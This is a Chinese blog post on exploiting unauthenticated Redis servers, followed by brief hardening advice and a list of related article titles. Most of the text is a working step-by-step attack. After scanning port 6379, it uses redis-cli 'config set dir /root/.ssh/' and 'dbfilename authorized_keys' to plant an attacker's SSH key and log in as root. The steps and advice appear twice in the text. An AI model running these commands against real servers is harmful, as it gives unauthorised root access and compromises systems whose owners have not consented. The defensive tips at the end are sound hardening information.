redis 未授权访问漏洞和防范
2017-11-05 17:07
836 查看
通过nmap扫描开放redis 6379端口
本机安装redis客户端,能连接远端redis数据库;(redis-cli)
本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pub
redis-cli -h 192.168.3.14 链接远程redis数据库
[root@hack bin]# ./redis-cli -h 192.168.3.14
192.168.3.14:6379> keys *
1) "xxxx"
192.168.3.14:6379> config set dir /root/.ssh/
192.168.3.14:6379> config set dbfilename authorized_keys
192.168.3.14:6379> set xxxx "\n\n\n 拷贝公钥文件内容(id_rsa.pub)\n\n\n"
192.168.3.14:6379> save
ssh root@192.168.3.14——发现可以直接登录了;
防范建议:
redis4.0默认的redis.conf文件把6379默认绑定在127.0.0.1;这里设置允许谁能访问我的redis,不要开放0.0.0.0所有访问;
redis4.0 的redis.conf里的protected-mode设置成yes;
对redis启用密码认证 requirepass foobared
限制ssh登录
设置redis rename config
本机安装redis客户端,能连接远端redis数据库;(redis-cli)
本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pub
redis-cli -h 192.168.3.14 链接远程redis数据库
[root@hack bin]# ./redis-cli -h 192.168.3.14
192.168.3.14:6379> keys *
1) "xxxx"
192.168.3.14:6379> config set dir /root/.ssh/
192.168.3.14:6379> config set dbfilename authorized_keys
192.168.3.14:6379> set xxxx "\n\n\n 拷贝公钥文件内容(id_rsa.pub)\n\n\n"
192.168.3.14:6379> save
ssh root@192.168.3.14——发现可以直接登录了;
防范建议:
redis4.0默认的redis.conf文件把6379默认绑定在127.0.0.1;这里设置允许谁能访问我的redis,不要开放0.0.0.0所有访问;
redis4.0 的redis.conf里的protected-mode设置成yes;
对redis启用密码认证 requirepass foobared
限制ssh登录
设置redis rename config
相关文章推荐
- Redis未授权访问漏洞
- redis未授权访问漏洞
- Redis 未授权访问漏洞
- Redis 未授权访问漏洞【原理扫描】修复方法
- Redis未授权访问漏洞
- Redis 未授权访问漏洞
- 关于Redis未授权访问漏洞利用的介绍与修复建议
- Redis 未授权访问漏洞讲解利用加批量寻找
- 关于Redis未授权访问漏洞利用的介绍与修复建议
- Redis未授权访问漏洞的利用姿势
- redis未授权访问漏洞利用
- Redis未授权访问漏洞分析
- 修补--Redis未授权访问漏洞
- Redis 未授权访问漏洞
- 服务器由于redis未授权访问漏洞被攻击
- UCloud-201809-001:Redis服务未授权访问漏洞安全预警
- Redis未授权访问漏洞
- Redis 未授权访问漏洞(附Python脚本)
- 不请自来 | Redis 未授权访问漏洞深度利用
- Redis未授权访问漏洞客户修复通知